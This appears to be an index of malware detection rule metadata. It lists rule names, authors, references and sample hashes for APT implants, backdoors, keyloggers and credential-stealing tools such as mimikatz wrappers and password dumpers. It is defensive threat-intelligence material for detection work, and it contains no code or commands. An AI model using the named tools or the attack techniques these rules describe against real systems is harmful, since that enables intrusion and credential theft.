malware_index FiveEyes_QUERTY_Malwaresig_20121_cmdDef description: FiveEyes QUERTY Malware - file 20121_cmdDef.xml author: Florian Roth reference: http://www.spiegel.de/media/media-35668.pdf date: 2015/01/18 hash: 64ac06aa4e8d93ea6063eade7ce9687b1d035907
malware_index Greenbug_Malware_4 description: Detects ISMDoor Backdoor author: Florian Roth reference: https://goo.gl/urp4CD date: 2017-01-25 super_rule: 1 hash1: 308a646f57c8be78e6a63ffea551a84b0ae877b23f28a660920c9ba82d57748f hash2: 82beaef407f15f3c5b2013cb25901c9fab27b086cadd35149794a25dce8abcb9
malware_index IMPLANT_1_v3 description: Downrage Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_1_v7 description: Downrage Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v3 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v15 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_2_v17 description: CORESHELL/SOURFACE Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_3_v1 description: X-Agent/CHOPSTICK Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_3_v3 description: X-Agent/CHOPSTICK Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v2 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v3_AlternativeRule description: BlackEnergy / Voodoo Bear Implant by APT28 comment: Alternative rule - not based on the original samples but samples on which the original rule matched author: Florian Roth reference: US CERT Grizzly Steppe Report date: 2017-02-12 hash1: 2244fe9c5d038edcb5406b45361613cf3909c491e47debef35329060b00c985a
malware_index IMPLANT_4_v4 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v5 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v9 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v10 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_4_v11 description: BlackEnergy / Voodoo Bear Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v2 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v3 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_5_v4 description: XTunnel Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_6_v1 description: Sednit / EVILTOSS Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_6_v2 description: Sednit / EVILTOSS Implant by APT28 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_7_v1 description: Implant 7 by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_8_v1 description: HAMMERTOSS / HammerDuke Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index IMPLANT_10_v2 description: CozyDuke / CozyCar / CozyBear Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index Unidentified_Malware_Two description: Unidentified Implant by APT29 author: US CERT reference: https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE date: 2017-02-10 score: 85
malware_index apt_hellsing_implantstrings Author: Costin Raiu, Kaspersky Lab Date: 2015-04-07 Description: detection for Hellsing implants Reference: http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back
malware_index APT_Hikit_msrv author: ThreatConnect Intelligence Research Team
malware_index IronTiger_ASPXSpy author: Cyber Safety Solutions, Trend Micro description: ASPXSpy detection. It might be used by other fraudsters reference: http://goo.gl/T5fSJC
malware_index IronTiger_ChangePort_Toolkit_driversinstall author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Changeport Toolkit driverinstall reference: http://goo.gl/T5fSJC
malware_index IronTiger_ChangePort_Toolkit_ChangePortExe author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Toolkit ChangePort reference: http://goo.gl/T5fSJC
malware_index IronTiger_dllshellexc2010 author: Cyber Safety Solutions, Trend Micro description: dllshellexc2010 Exchange backdoor + remote shell reference: http://goo.gl/T5fSJC
malware_index IronTiger_dnstunnel author: Cyber Safety Solutions, Trend Micro description: This rule detects a dns tunnel tool used in Operation Iron Tiger reference: http://goo.gl/T5fSJC
malware_index IronTiger_EFH3_encoder author: Cyber Safety Solutions, Trend Micro description: Iron Tiger EFH3 Encoder reference: http://goo.gl/T5fSJC
malware_index IronTiger_GetPassword_x64 author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GetPassword x64 reference: http://goo.gl/T5fSJC
malware_index IronTiger_GetUserInfo author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GetUserInfo reference: http://goo.gl/T5fSJC
malware_index IronTiger_Gh0stRAT_variant author: Cyber Safety Solutions, Trend Micro description: This is a detection for a s.exe variant seen in Op. Iron Tiger reference: http://goo.gl/T5fSJC
malware_index IronTiger_GTalk_Trojan author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - GTalk Trojan reference: http://goo.gl/T5fSJC
malware_index IronTiger_HTTPBrowser_Dropper author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - HTTPBrowser Dropper reference: http://goo.gl/T5fSJC
malware_index IronTiger_HTTP_SOCKS_Proxy_soexe author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Toolset - HTTP SOCKS Proxy soexe reference: http://goo.gl/T5fSJC
malware_index IronTiger_NBDDos_Gh0stvariant_dropper author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - NBDDos Gh0stvariant Dropper reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_DosEmulator author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX DosEmulator reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_FastProxy author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX FastProxy reference: http://goo.gl/T5fSJC
malware_index IronTiger_PlugX_Server author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - PlugX Server reference: http://goo.gl/T5fSJC
malware_index IronTiger_ReadPWD86 author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - ReadPWD86 reference: http://goo.gl/T5fSJC
malware_index IronTiger_Ring_Gh0stvariant author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Malware - Ring Gh0stvariant reference: http://goo.gl/T5fSJC
malware_index IronTiger_wmiexec author: Cyber Safety Solutions, Trend Micro description: Iron Tiger Tool - wmi.vbs detection reference: http://goo.gl/T5fSJC
malware_index IronPanda_Malware_Htran description: Iron Panda Malware Htran author: Florian Roth reference: https://goo.gl/E4qia9 date: 2015-09-16 hash: 7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7
malware_index KeyBoy_Dropper Author: Rapid7 Labs Date: 2013/06/07 Description: Strings inside Reference: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india
malware_index KeyBoy_Backdoor Author: Rapid7 Labs Date: 2013/06/07 Description: Strings inside Reference: https://community.rapid7.com/community/infosec/blog/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india
malware_index EliseLotusBlossom author: Jose Ramon Palanco date: 2015-06-23 description: Elise Backdoor Trojan ref: https://www.paloaltonetworks.com/resources/research/unit42-operation-lotus-blossom.html
malware_index MirageStrings description: Mirage Identifying Strings author: Seth Hardy last_modified: 2014-06-25
malware_index Mirage description: Mirage author: Seth Hardy last_modified: 2014-06-25
malware_index Mirage_APT Author: Silas Cutler Date: yyyy/mm/dd Description: Malware related to APT campaign Reference: Useful link
malware_index Molerats_certs Author: FireEye Labs Date: 2013/08/23 Description: this rule detections code signed with certificates used by the Molerats actor Reference: https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html
malware_index MongalCode description: Mongal code features author: Seth Hardy last_modified: 2014-07-15
malware_index MongalStrings description: Mongal Identifying Strings author: Seth Hardy last_modified: 2014-07-15
malware_index Mongal description: Mongal author: Seth Hardy last_modified: 2014-07-15
malware_index APT_NGO_wuaclt author: AlienVault Labs
malware_index ZhoupinExploitCrew author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index BackDoorLogger author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index Jasus author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index NetC author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index ShellCreator2 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index SmartCopy2 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index SynFlooder author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index TinyZBot author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index antivirusdetector author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index csext author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index kagent author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index mimikatzWrapper author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index pvz_in author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index pvz_out author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index wndTest author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhCat author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhLookUp author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index zhmimikatz author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index Zh0uSh311 author: Cylance date: 2014-12-02 description: http://cylance.com/opcleaver
malware_index OPCLEAVER_BackDoorLogger description: Keylogger used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_Jasus description: ARP cache poisoner used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_NetC description: Net Crawler used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_ShellCreator2 description: Shell Creator used by attackers in Operation Cleaver to create ASPX web shells reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_SmartCopy2 description: Malware or hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_SynFlooder description: Malware or hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_TinyZBot description: Tiny Bot used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_ZhoupinExploitCrew description: Keywords used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_antivirusdetector description: Hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_csext description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_kagent description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_mimikatzWrapper description: Mimikatz Wrapper used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_pvz_in description: Parviz tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_pvz_out description: Parviz tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_wndTest description: Backdoor used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_zhLookUp description: Hack tool used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OPCLEAVER_zhmimikatz description: Mimikatz wrapper used by attackers in Operation Cleaver reference: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf date: 2014/12/02 author: Cylance Inc. score: 70
malware_index OpClandestineWolf alert_severity: HIGH log: false author: NDF weight: 10 alert: True source: https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html version: 1 date: 2015-06-23 description: Operation Clandestine Wolf signature based on OSINT from 06.23.15 hash0: 1a4b710621ef2e69b1f7790ae9b7a288 hash1: 917c92e8662faf96fffb8ffe7b7c80fb hash2: 975b458cb80395fa32c9dda759cb3f7b hash3: 3ed34de8609cd274e49bbd795f21acc4 hash4: b1a55ec420dd6d24ff9e762c7b753868 hash5: afd753a42036000ad476dcd81b56b754 hash6: fad20abf8aa4eda0802504d806280dd7 hash7: ab621059de2d1c92c3e7514e4b51751a hash8: 510b77a4b075f09202209f989582dbea hash9: d1b1abfcc2d547e1ea1a4bb82294b9a3 hash10: 4692337bf7584f6bda464b9a76d268c1 hash11: 7cae5757f3ba9fef0a22ca0d56188439 hash12: 1a7ba923c6aa39cc9cb289a17599fce0 hash13: f86db1905b3f4447eb5728859f9057b5 hash14: 37c6d1d3054e554e13d40ea42458ebed hash15: 3e7430a09a44c0d1000f76c3adc6f4fa hash16: 98eb249e4ddc4897b8be6fe838051af7 hash17: 1b57a7fad852b1d686c72e96f7837b44 hash18: ffb84b8561e49a8db60e0001f630831f hash19: 98eb249e4ddc4897b8be6fe838051af7 hash20: dfb4025352a80c2d81b84b37ef00bcd0 hash21: 4457e89f4aec692d8507378694e0a3ba hash22: 48de562acb62b469480b8e29821f33b8 hash23: 7a7eed9f2d1807f55a9308e21d81cccd hash24: 6817b29e9832d8fd85dcbe4af176efb6
malware_index Misdat_Backdoor author: Cylance SPEAR Team
malware_index SType_Backdoor author: Cylance SPEAR Team
malware_index Zlib_Backdoor author: Cylance SPEAR Team
malware_index Potao Author: Anton Cherepanov Date: 2015/07/29 Description: Operation Potao Reference: http://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf Source: https://github.com/eset/malware-ioc/ Contact: threatintel@eset.com License: BSD 2-Clause
malware_index backdoor_apt_pcclient author: @patrickrolsen maltype: APT.PCCLient filetype: DLL version: 0.1 description: Detects the dropper: 869fa4dfdbabfabe87d334f85ddda234 AKA dw20.dll/msacm32.drv dropped by 4a85af37de44daf5917f545c6fd03902 (RTF) date: 2012-10
malware_index PassCV_Sabre_Malware_Signing_Cert description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 score: 50 hash1: 7c32885c258a6d5be37ebe83643f00165da3ebf963471503909781540204752e
malware_index PassCV_Sabre_Malware_Excalibur_1 description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 hash1: 21566f5ff7d46cc9256dae8bc7e4c57f2b9261f95f6ad2ac921558582ea50dfb hash2: 02922c5d994e81629d650be2a00507ec5ca221a501fe3827b5ed03b4d9f4fb70
malware_index PassCV_Sabre_Malware_5 description: PassCV Malware mentioned in Cylance Report author: Florian Roth reference: https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies date: 2016-10-20 hash1: 03aafc5f468a84f7dd7d7d38f91ff17ef1ca044e5f5e8bbdfe589f5509b46ae5
malware_index APT_Win_Pipcreat author: chort (@chort0) description: APT backdoor Pipcreat filetype: pe,dll date: 2013-03 MD5: f09d832bea93cf320986b53fce4b8397 Reference: http://www.cyberengineeringservices.com/login-exe-analysis-trojan-pipcreat/ version: 1.0
malware_index Trojan_Win32_PlaSrv author: Microsoft description: Hotpatching Injector original_sample_sha1: ff7f949da665ba8ce9fb01da357b51415634eaad unpacked_sample_sha1: dff2fee984ba9f5a8f5d97582c83fca4fa1fe131 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Platual author: Microsoft description: Installer component original_sample_sha1: e0ac2ae221328313a7eee33e9be0924c46e2beb9 unpacked_sample_sha1: ccaf36c2d02c3c5ca24eeeb7b1eae7742a23a86a activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plaplex author: Microsoft description: Variant of the JPin backdoor original_sample_sha1: ca3bda30a3cdc15afb78e54fa1bbb9300d268d66 unpacked_sample_sha1: 2fe3c80e98bbb0cf5a0c4da286cd48ec78130a24 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Dipsind_B author: Microsoft description: Dipsind Family sample_sha1: 09e0dfbb5543c708c0dd6a89fd22bbb96dc4ca1c activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_PlaKeylog_B author: Microsoft description: Keylogger component original_sample_sha1: 0096a3e0c97b85ca75164f48230ae530c94a2b77 unpacked_sample_sha1: 6a1412daaa9bdc553689537df0a004d44f8a45fd activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Adupib author: Microsoft description: Adupib SSL Backdoor original_sample_sha1: d3ad0933e1b114b14c2b3a2c59d7f8a95ea0bcbd unpacked_sample_sha1: a80051d5ae124fd9e5cc03e699dd91c2b373978b activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_PlaLsaLog author: Microsoft description: Loader / possible incomplete LSA Password Filter original_sample_sha1: fa087986697e4117c394c9a58cb9f316b2d9f7d8 unpacked_sample_sha1: 29cb81dbe491143b2f8b67beaeae6557d8944ab4 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plakelog author: Microsoft description: Raw-input based keylogger original_sample_sha1: 3907a9e41df805f912f821a47031164b6636bd04 unpacked_sample_sha1: 960feeb15a0939ec0b53dcb6815adbf7ac1e7bb2 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plainst author: Microsoft description: Installer component original_sample_sha1: 99c08d31af211a0e17f92dd312ec7ca2b9469ecb unpacked_sample_sha1: dcb6cf7cf7c8fdfc89656a042f81136bda354ba6 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plagicom author: Microsoft description: Installer component original_sample_sha1: 99dcb148b053f4cef6df5fa1ec5d33971a58bd1e unpacked_sample_sha1: c1c950bc6a2ad67488e675da4dfc8916831239a7 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plaklog author: Microsoft description: Hook-based keylogger original_sample_sha1: 831a5a29d47ab85ee3216d4e75f18d93641a9819 unpacked_sample_sha1: e18750207ddbd939975466a0e01bd84e75327dda activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plapiio author: Microsoft description: JPin backdoor original_sample_sha1: 3119de80088c52bd8097394092847cd984606c88 unpacked_sample_sha1: 3acb8fe2a5eb3478b4553907a571b6614eb5455c activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Plabit author: Microsoft description: Installer component sample_sha1: 6d1169775a552230302131f9385135d385efd166 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc2 author: Microsoft description: Dipsind variant original_sample_sha1: bf944eb70a382bd77ee5b47548ea9a4969de0527 unpacked_sample_sha1: d807648ddecc4572c7b04405f496d25700e0be6e activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc3 author: Microsoft description: Dipsind variant original_sample_sha1: 1b542dd0dacfcd4200879221709f5fa9683cdcda unpacked_sample_sha1: bbd4992ee3f3a3267732151636359cf94fb4575d activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index Trojan_Win32_Placisc4 author: Microsoft description: Installer for Dipsind variant original_sample_sha1: 3d17828632e8ff1560f6094703ece5433bc69586 unpacked_sample_sha1: 2abb8e1e9cac24be474e4955c63108ff86d1a034 activity_group: Platinum version: 1.0 last_modified: 2016-04-12
malware_index PrikormkaDropper
malware_index PrikormkaModule
malware_index Prikormka Author: Anton Cherepanov Date: 2016/05/10 Description: Operation Groundbait Source: https://github.com/eset/malware-ioc/ Contact: threatintel@eset.com License: BSD 2-Clause
malware_index apt_regin_legspin copyright: Kaspersky Lab description: Rule to detect Regin's Legspin module version: 1.0 last_modified: 2015-01-22 reference: https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/ md5: 29105f46e4d33f66fee346cfd099d1cc
malware_index apt_regin_rc5key copyright: Kaspersky Lab description: Rule to detect Regin RC5 decryption keys version: 1.0 last_modified: 2014-11-18
malware_index apt_regin_dispatcher_disp_dll copyright: Kaspersky Lab author: Kaspersky Lab description: Rule to detect Regin disp.dll dispatcher version: 1.0 last_modified: 2014-11-18
malware_index Scieron author: Symantec Security Response ref: http://www.symantec.com/connect/tr/blogs/scarab-attackers-took-aim-select-russian-targets-2012 date: 22.01.15
malware_index apt_sofacy_xtunnel author: Claudio Guarnieri description: Sofacy Malware - German Bundestag score: 75
malware_index StuxNet_Malware_1 description: Stuxnet Sample - file malware.exe author: Florian Roth reference: Internal Research date: 2016-07-09 hash1: 9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8
malware_index liudoor author: RSA FirstWatch date: 2015-07-23 description: Detects Liudoor daemon backdoor hash0: 78b56bc3edbee3a425c96738760ee406 hash1: 5aa0510f6f1b0e48f0303b9a4bfc641e hash2: 531d30c8ee27d62e6fbe855299d0e7de hash3: 2be2ac65fd97ccc97027184f0310f2f3 hash4: 6093505c7f7ec25b1934d3657649ef07 type: Win32 DLL
malware_index ThreatGroup3390_C2 description: Threat Group 3390 APT - C2 Server author: Florian Roth reference: http://snip.ly/giNB date: 2015-08-06 score: 60
malware_index Turla_APT_Malware_Gen2 description: Detects Turla malware (based on sample used in the RUAG APT case) author: Florian Roth family: Turla reference: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case date: 2016-06-09 hash1: 0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4 hash2: 7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9 hash3: fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd hash4: c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4
malware_index turla_dropper maltype: turla dropper ref: https://github.com/reed1713 reference: http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf date: 3/13/2014 description: This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in teh temp dir and registers an auto start service call "RPC Endpoint Locator".
malware_index dubseven_dropper_dialog_remains author: Matt Brooks, @cmatthewbrooks desc: Searches for related dialog remnants. How rude.
malware_index maindll_mutex author: Matt Brooks, @cmatthewbrooks desc: Matches on the maindll mutex ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_dialog_remains author: Matt Brooks, @cmatthewbrooks desc: Searches for related dialog remnants. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_mutex author: Matt Brooks, @cmatthewbrooks desc: Searches for the mutex. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_command_and_control author: Matt Brooks, @cmatthewbrooks desc: Searches for the C2 server. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_campaign_code author: Matt Brooks, @cmatthewbrooks desc: Searches for the related campaign code. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index SLServer_unknown_string author: Matt Brooks, @cmatthewbrooks desc: Searches for a unique string. ref: https://citizenlab.org/2016/04/between-hong-kong-and-burma/
malware_index Unit78020_Malware_Gen1 description: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule author: Florian Roth reference: http://threatconnect.com/camerashy/?utm_campaign=CameraShy date: 2015-09-24 hash1: 2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72 hash2: 76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd hash3: 2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac hash4: 5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2 hash5: 7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af hash6: 88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790
malware_index WaterBug_wipbot_2013_dll description: Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_wipbot_2013_core description: Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_turla_dropper description: Symantec Waterbug Attack - Trojan Turla Dropper author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_fa_malware description: Symantec Waterbug Attack - FA malware variant author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index WaterBug_sav description: Symantec Waterbug Attack - SAV Malware author: Symantec Security Response date: 22.01.2015 reference: http://t.co/rF35OaAXrl
malware_index onimiki description: Linux/Onimiki malicious DNS server malware: Linux/Onimiki operation: Windigo author: Olivier Bilodeau <bilodeau@eset.com> created: 2014-02-06 reference: http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf contact: windigo@eset.sk source: https://github.com/eset/malware-ioc/ license: BSD 2-Clause
